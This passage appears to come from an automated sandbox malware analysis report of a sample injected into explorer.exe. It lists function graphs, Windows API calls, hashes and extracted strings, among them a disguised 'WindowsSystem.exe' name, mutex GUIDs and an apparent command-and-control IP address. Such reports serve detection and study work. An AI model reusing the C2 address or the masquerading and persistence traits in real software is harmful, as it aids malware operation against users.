985->988 986->968 987->968 989 e1a2c9-e1a319 call e02260 call e1b4b0 988->989 990 e1a2bf-e1a2c7 988->990 989->982 990->968
                                                                                                            APIs
                                                                                                            • std::rethrow_exception.LIBCMTD ref: 00E19D70
                                                                                                            • std::rethrow_exception.LIBCMTD ref: 00E19DF4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: std::rethrow_exception
                                                                                                            • String ID: */*$GET$h
                                                                                                            • API String ID: 1317400359-3109941101
                                                                                                            • Opcode ID: 706f8eab67db1428491878b4aef581ec6e6f376884b732e353feec605afe0311
                                                                                                            • Instruction ID: fe95a893dd72173f829b185808183df858a2ad4a94920c78aacf251201611ba9
                                                                                                            • Opcode Fuzzy Hash: 706f8eab67db1428491878b4aef581ec6e6f376884b732e353feec605afe0311
                                                                                                            • Instruction Fuzzy Hash: B502E072209AC486E774CB55F8943EEB3A0F3C9784F505126DB9993AA8DF7DC588CB00
                                                                                                            Function 00E22210 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 132threadnetworkstringCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 995 e22210-e22228 lstrlenW 996 e222a0-e222a7 995->996 997 e2222a-e2224c CreateEventW 995->997 998 e2238c-e22393 996->998 999 e222ad-e222b5 call e1ddc0 996->999 997->996 1000 e2224e-e22282 CreateThread 997->1000 1001 e22395 call e0f200 998->1001 1002 e2239a-e223a1 998->1002 999->998 1013 e222bb-e222f7 call e0f510 999->1013 1004 e22284 1000->1004 1005 e22288-e22295 LocalFree 1000->1005 1001->1002 1007 e223a3 call e0ee80 1002->1007 1008 e223a8-e223af 1002->1008 1004->996 1005->996 1007->1008 1011 e223b1 call e1c130 1008->1011 1012 e223b6-e223c7 call e16790 1008->1012 1011->1012 1020 e22432-e22443 WSAStartup 1012->1020 1021 e223c9-e223eb CreateEventW 1012->1021 1013->998 1019 e222fd-e22386 call e28378 call e07ef0 LocalFree 1013->1019 1019->998 1024 e22445-e2244c 1020->1024 1025 e224bd 1020->1025 1021->1020 1023 e223ed-e22421 CreateThread 1021->1023 1030 e22423 1023->1030 1031 e22425-e2242c CloseHandle 1023->1031 1026 e2247a-e224ae CreateThread 1024->1026 1027 e2244e-e22473 CreateThread 1024->1027 1028 e224c2-e224ca 1025->1028 1032 e224b0-e224b5 1026->1032 1033 e224b7 WSACleanup 1026->1033 1027->1026 1030->1020 1031->1020 1032->1028 1033->1025
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Create$Thread$EventFreeLocal$CleanupCloseHandleStartuplstrlen
                                                                                                            • String ID: "%s%s"$UNLOAD.TXT$WindowsSystem$WindowsSystem$WindowsSystem.exe${34E50511-FBB8-42F8-98A2-2629192A03A0}
                                                                                                            • API String ID: 168511978-1681456302
                                                                                                            • Opcode ID: 16fe39ba53266679c6a7dea738d884dd69b85df6d687fb142a66e2484d54e1df
                                                                                                            • Instruction ID: 076b21d92ef2e47622b55f83372b520577d4d01939be105bdab80a05b0203f0f
                                                                                                            • Opcode Fuzzy Hash: 16fe39ba53266679c6a7dea738d884dd69b85df6d687fb142a66e2484d54e1df
                                                                                                            • Instruction Fuzzy Hash: 34614D31104BD1D2F728DB20FE5879A33A4F3A838DF505A2AD55967AA4CF7EC589CB00
                                                                                                            Function 00E01000 Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 82COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 00E187C0: LoadLibraryW.KERNEL32 ref: 00E187D2
                                                                                                            • ExitProcess.KERNEL32 ref: 00E0104B
                                                                                                            • GetModuleFileNameW.KERNEL32 ref: 00E01076
                                                                                                            • ExitProcess.KERNEL32 ref: 00E01082
                                                                                                            Strings
                                                                                                            • {DD700AA6-D197-4A4A-838A-B93EA96F236B}, xrefs: 00E010FB
                                                                                                            • {16875766-AD57-416F-8330-F0B6BCC3AFF1}, xrefs: 00E010AF
                                                                                                            • {8D32440A-6991-45E9-84BE-12C6B52AF58D}, xrefs: 00E01134
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess$FileLibraryLoadModuleName
                                                                                                            • String ID: {16875766-AD57-416F-8330-F0B6BCC3AFF1}${8D32440A-6991-45E9-84BE-12C6B52AF58D}${DD700AA6-D197-4A4A-838A-B93EA96F236B}
                                                                                                            • API String ID: 2450766465-2697939069
                                                                                                            • Opcode ID: 482fb3a350b31bacb31896883e192aa97b6bd53c2f9ebca60f0dcddbc31280cb
                                                                                                            • Instruction ID: 9019bb6acfd2252b5cadacf5b5dac99bf20475356b182f26ee8889f098fbf172
                                                                                                            • Opcode Fuzzy Hash: 482fb3a350b31bacb31896883e192aa97b6bd53c2f9ebca60f0dcddbc31280cb
                                                                                                            • Instruction Fuzzy Hash: 1A415270114BC086E738DB30FD5935E73A1FBA4785F505E2AD68AA66A4DF3EC588C740
                                                                                                            Function 00E07EF0 Relevance: 25.2, APIs: 10, Strings: 4, Instructions: 708COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1102 e07ef0-e0800f call e17da0 * 2 CoInitializeEx 1107 e08011-e08013 1102->1107 1108 e08018-e08064 CoInitializeSecurity 1102->1108 1109 e08e9c-e08ea5 1107->1109 1110 e08066 1108->1110 1111 e0806b-e080a3 CoCreateInstance 1108->1111 1112 e08e02-e08e0a CoUninitialize 1110->1112 1113 e080a5 1111->1113 1114 e080aa-e0830f call e13320 * 4 call e133a0 * 4 1111->1114 1112->1109 1113->1112 1132 e08311 1114->1132 1133 e08316-e0839c call e13040 call e130f0 call e130d0 1114->1133 1134 e08e0f-e08e18 1132->1134 1144 e083a3-e08459 call e13040 call e130f0 call e130d0 1133->1144 1145 e0839e 1133->1145 1136 e08e30-e08e38 CoUninitialize 1134->1136 1137 e08e1a-e08e25 1134->1137 1136->1109 1137->1136 1155 e0845b-e08479 CoUninitialize 1144->1155 1156 e0847e-e084ab 1144->1156 1145->1134 1155->1109 1159 e084b2-e084e9 1156->1159 1160 e084ad 1156->1160 1170 e084f0-e08523 1159->1170 1171 e084eb 1159->1171 1161 e08e3a-e08e43 1160->1161 1163 e08e45-e08e50 1161->1163 1164 e08e5b-e08e64 1161->1164 1163->1164 1165 e08e66-e08e71 1164->1165 1166 e08e7c-e08e82 1164->1166 1165->1166 1167 e08e94-e08e9a CoUninitialize 1166->1167 1168 e08e84-e08e8c 1166->1168 1167->1109 1168->1167 1173 e08525 1170->1173 1174 e0852a-e085f1 call e13040 call e130f0 call e130d0 1170->1174 1171->1161 1173->1161 1185 e085f3 1174->1185 1186 e085f8-e0862b 1174->1186 1185->1161 1188 e08632-e08686 1186->1188 1189 e0862d 1186->1189 1192 e08688 1188->1192 1193 e0868d-e086e2 1188->1193 1189->1161 1192->1161 1196 e086e4 1193->1196 1197 e086e9-e08726 CoCreateGuid 1193->1197 1196->1161 1198 e08741-e087c0 call e13040 call e130f0 call e130d0 1197->1198 1199 e08728-e0873b StringFromGUID2 1197->1199 1207 e087c2 1198->1207 1208 e087c7-e08818 call e28378 1198->1208 1199->1198 1207->1161 1212 e0881a 1208->1212 1213 e0881f-e088fb call e13040 call e130f0 call e130d0 1208->1213 1212->1161 1223 e08902-e08929 1213->1223 1224 e088fd 1213->1224 1226 e08930-e08938 1223->1226 1227 e0892b 1223->1227 1224->1161 1228 e08947 1226->1228 1229 e0893a-e08945 1226->1229 1227->1161 1230 e08952-e0898f 1228->1230 1229->1230 1232 e08991 1230->1232 1233 e08996-e089c6 1230->1233 1232->1161 1235 e089c8 1233->1235 1236 e089cd-e08a03 1233->1236 1235->1161 1238 e08a05 1236->1238 1239 e08a0a-e08a55 1236->1239 1238->1161 1242 e08a57 1239->1242 1243 e08a5c-e08aa5 1239->1243 1242->1161 1246 e08aa7 1243->1246 1247 e08aac-e08ad9 1243->1247 1246->1161 1249 e08ae0-e08b0d 1247->1249 1250 e08adb 1247->1250 1252 e08b14-e08daf call e13340 call e13320 call e13340 call e13040 call e130f0 call e130d0 call e133a0 * 3 1249->1252 1253 e08b0f 1249->1253 1250->1161 1274 e08db1 1252->1274 1275 e08db6-e08dfd CoUninitialize 1252->1275 1253->1161 1274->1161 1275->1109
                                                                                                            APIs
                                                                                                              • Part of subcall function 00E17DA0: lstrlenW.KERNEL32 ref: 00E17DEC
                                                                                                            • CoInitializeEx.COMBASE ref: 00E07FFA
                                                                                                            • CoInitializeSecurity.COMBASE ref: 00E0804F
                                                                                                            • CoUninitialize.COMBASE ref: 00E08E02
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Initialize$SecurityUninitializelstrlen
                                                                                                            • String ID: PT%dS$PT0S$d$default
                                                                                                            • API String ID: 1917595471-1758076759
                                                                                                            • Opcode ID: 4e90035ec76b44f55509a06cae46d70251e4bebeacf918fb3399efe7daf0ae58
                                                                                                            • Instruction ID: f374923ac95c483049660372fe32757451e57fb74ca43f085027c5b94e8e82d5
                                                                                                            • Opcode Fuzzy Hash: 4e90035ec76b44f55509a06cae46d70251e4bebeacf918fb3399efe7daf0ae58
                                                                                                            • Instruction Fuzzy Hash: 9782A236209FC4C6DA71DB15E8943DAB3A5F3C8B91F405126DA8D93B68DF39C689CB40
                                                                                                            Function 00E1DAD0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 106encryptionsynchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 00E1DB10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Crypt$Hash$Context$DataRelease$AcquireCreateDestroyObjectSingleWait
                                                                                                            • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                                                                            • API String ID: 1452691613-63410773
                                                                                                            • Opcode ID: a49916f8dd68e5eae8b0ebcf852319b595e90230a14c1e63738e3af535b9c1ed
                                                                                                            • Instruction ID: 6333354a99b8cbd41ddcad6d807c245dce370f8973fa518da3aa62f6c470be9c
                                                                                                            • Opcode Fuzzy Hash: a49916f8dd68e5eae8b0ebcf852319b595e90230a14c1e63738e3af535b9c1ed
                                                                                                            • Instruction Fuzzy Hash: 69510B3261CA8083E754CF15F88479AB7A1F7D4784F506915F68A93A68CFBEC884CB40
                                                                                                            Function 00E22286 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 101threadnetworkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32 ref: 00E22386
                                                                                                            • CreateEventW.KERNEL32 ref: 00E223D6
                                                                                                            • CreateThread.KERNEL32 ref: 00E2240C
                                                                                                            • CloseHandle.KERNEL32 ref: 00E2242C
                                                                                                            • WSAStartup.WS2_32 ref: 00E2243B
                                                                                                            • CreateThread.KERNEL32 ref: 00E2246D
                                                                                                            • CreateThread.KERNEL32 ref: 00E22499
                                                                                                              • Part of subcall function 00E1DDC0: AllocateAndInitializeSid.ADVAPI32 ref: 00E1DE32
                                                                                                              • Part of subcall function 00E1DDC0: CheckTokenMembership.ADVAPI32 ref: 00E1DE4F
                                                                                                              • Part of subcall function 00E1DDC0: FreeSid.ADVAPI32 ref: 00E1DE66
                                                                                                            • WSACleanup.WS2_32 ref: 00E224B7
                                                                                                              • Part of subcall function 00E0F510: SHGetKnownFolderPath.SHELL32 ref: 00E0F587
                                                                                                              • Part of subcall function 00E0F510: lstrlenW.KERNEL32 ref: 00E0F59A
                                                                                                              • Part of subcall function 00E0F510: lstrlenW.KERNEL32 ref: 00E0F5B5
                                                                                                              • Part of subcall function 00E0F510: LocalAlloc.KERNEL32 ref: 00E0F5DC
                                                                                                              • Part of subcall function 00E0F510: lstrlenW.KERNEL32 ref: 00E0F620
                                                                                                              • Part of subcall function 00E0F510: CoTaskMemFree.COMBASE ref: 00E0F635
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                              • Part of subcall function 00E07EF0: CoInitializeEx.COMBASE ref: 00E07FFA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Create$FreeThreadlstrlen$InitializeLocal$AllocAllocateCheckCleanupCloseEventFolderHandleKnownMembershipPathStartupTaskToken_errno_invalid_parameter_noinfo
                                                                                                            • String ID: "%s%s"$WindowsSystem$WindowsSystem$WindowsSystem.exe${34E50511-FBB8-42F8-98A2-2629192A03A0}
                                                                                                            • API String ID: 2779143808-474631092
                                                                                                            • Opcode ID: 395866f993da45b9c750652c6559c33394b50d3bb72537e97a8bc5148c645c89
                                                                                                            • Instruction ID: daf89f6b2a87d8303da4a912b0628bf4f7edb3f67ebd197a01d0c1f507e311a6
                                                                                                            • Opcode Fuzzy Hash: 395866f993da45b9c750652c6559c33394b50d3bb72537e97a8bc5148c645c89
                                                                                                            • Instruction Fuzzy Hash: 13515D31104BD196E738EB20F95879A33A5F39838CF50592AD65977AA4DF7DC688CB00
                                                                                                            Function 00E187C0 Relevance: 119.9, APIs: 51, Strings: 17, Instructions: 909libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID: ADVAPI32.DLL$CRYPT32.DLL$DBGHELP.DLL$GDI32.DLL$GDIPLUS.DLL$KERNEL32.DLL$MSI.DLL$NTDLL.DLL$OLE32.DLL$SECUR32.DLL$SHELL32.DLL$SHLWAPI.DLL$USER32.DLL$WINHTTP.DLL$WINMM.DLL$WS2_32.DLL$WTSAPI32.DLL
                                                                                                            • API String ID: 2574300362-2969658442
                                                                                                            • Opcode ID: b00bce88697c7525284cc10c94eef30e1ae8b74fc276d152b0c34e2d56b66801
                                                                                                            • Instruction ID: 23cbf21329673fe4d30980291d1ecb8da0fafc2605024ca1979bb1053c9507d1
                                                                                                            • Opcode Fuzzy Hash: b00bce88697c7525284cc10c94eef30e1ae8b74fc276d152b0c34e2d56b66801
                                                                                                            • Instruction Fuzzy Hash: A0B2E336219BC5C5EB30CB14E4943EAB3A0F7D9B45F501916CA8EA3B69DF38C589CB41
                                                                                                            Function 00E26370 Relevance: 75.7, APIs: 40, Strings: 3, Instructions: 439synchronizationCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 366 e26370-e26404 call e21f90 * 2 371 e2640f-e26416 366->371 372 e26b7f-e26b94 WaitForSingleObject 371->372 373 e2641c-e26431 WaitForSingleObject 371->373 375 e26b96-e26b9d 372->375 376 e26b9f 372->376 373->372 374 e26437-e2645c 373->374 380 e267e2-e26809 WaitForMultipleObjects 374->380 381 e26462-e26469 374->381 375->376 378 e26ba9-e26bb4 375->378 376->378 379 e26cab-e26cb6 376->379 382 e26bc6-e26bce 378->382 383 e26cc8-e26cd0 379->383 386 e26815 380->386 387 e2680b-e26813 380->387 384 e26482 381->384 385 e2646b-e26480 WaitForSingleObject 381->385 388 e26bd4-e26be5 382->388 389 e26c6e-e26c77 382->389 390 e26d70-e26d79 383->390 391 e26cd6-e26ce7 383->391 384->379 385->384 392 e2648c-e2649d 385->392 386->379 387->386 395 e2681f-e26827 387->395 396 e26be7-e26c20 shutdown closesocket 388->396 397 e26c2c-e26c3d 388->397 393 e26ca6 389->393 394 e26c79-e26c9a shutdown closesocket 389->394 400 e26d7b-e26d9c shutdown closesocket 390->400 401 e26da8-e26dbf LocalFree 390->401 398 e26ce9-e26d22 shutdown closesocket 391->398 399 e26d2e-e26d3f 391->399 402 e264a3-e264aa 392->402 403 e267dd 392->403 393->371 393->379 394->393 404 e26833-e2683a 395->404 405 e26829 395->405 396->397 406 e26c69 397->406 407 e26c3f-e26c60 CloseHandle 397->407 398->399 408 e26d41-e26d62 CloseHandle 399->408 409 e26d6b 399->409 400->401 410 e264c3 402->410 411 e264ac-e264c1 WaitForSingleObject 402->411 403->380 412 e26846-e2686b 404->412 413 e2683c 404->413 405->378 406->382 407->406 408->409 409->383 410->380 411->410 416 e264c8-e26531 call e23b40 411->416 419 e26871-e26878 412->419 420 e26b7a 412->420 413->378 425 e26537-e2657c setsockopt 416->425 426 e267cd-e267d6 416->426 422 e2687a-e2688c WaitForSingleObject 419->422 423 e2688e 419->423 420->371 422->423 424 e26898-e268b5 WaitForSingleObject 422->424 423->379 427 e26b75 424->427 428 e268bb-e268eb WSAEnumNetworkEvents 424->428 429 e26582-e265b8 setsockopt 425->429 430 e267ac-e267c7 shutdown closesocket 425->430 426->403 427->420 431 e268f1-e268fd 428->431 432 e26b06-e26b6c shutdown closesocket CloseHandle 428->432 429->430 433 e265be-e26605 call e24c90 429->433 430->426 435 e26973-e2697f 431->435 436 e268ff-e2696e shutdown closesocket CloseHandle 431->436 432->427 433->430 440 e2660b-e26653 call e24740 433->440 438 e26b04 435->438 439 e26985-e269bd recv 435->439 436->438 438->427 441 e269c3-e269e2 call e22660 439->441 442 e26a95-e26afb shutdown closesocket CloseHandle 439->442 440->430 447 e26659-e26661 440->447 448 e26a24-e26a8a shutdown closesocket CloseHandle 441->448 449 e269e4-e26a22 CloseHandle 441->449 442->438 447->430 450 e26667-e266ba call e24c90 447->450 451 e26a93 448->451 449->451 450->430 454 e266c0-e26708 call e24740 450->454 451->438 454->430 457 e2670e-e26716 454->457 457->430 458 e2671c-e26733 WSACreateEvent 457->458 458->430 459 e26735-e26753 WSAEventSelect 458->459 460 e26755-e26780 459->460 461 e2678a-e267a3 CloseHandle 459->461 460->461 461->430
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Wait$ObjectSingle$closesocketshutdown$CloseFreeHandleLocalMultipleObjects
                                                                                                            • String ID: 185.157.162.216$8${8E8A4502-77C1-498F-9A62-1CFFC74945A4}
                                                                                                            • API String ID: 3117981272-2772078998
                                                                                                            • Opcode ID: a5040a68671dcfb0dfe58ac7fac9030a3d34697973cce43685bc7efebe8f99a8
                                                                                                            • Instruction ID: 442509c728517c0f6bac57f0e9184906eb7c498e04d7fd23c46461e4a8166aac
                                                                                                            • Opcode Fuzzy Hash: a5040a68671dcfb0dfe58ac7fac9030a3d34697973cce43685bc7efebe8f99a8
                                                                                                            • Instruction Fuzzy Hash: 5B32D732218AD4C6DB719B15F8893DAB361F7D8798F605216D6C9A3B68CF7EC448CB00
                                                                                                            Function 00E23B40 Relevance: 61.8, APIs: 41, Instructions: 306networkCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
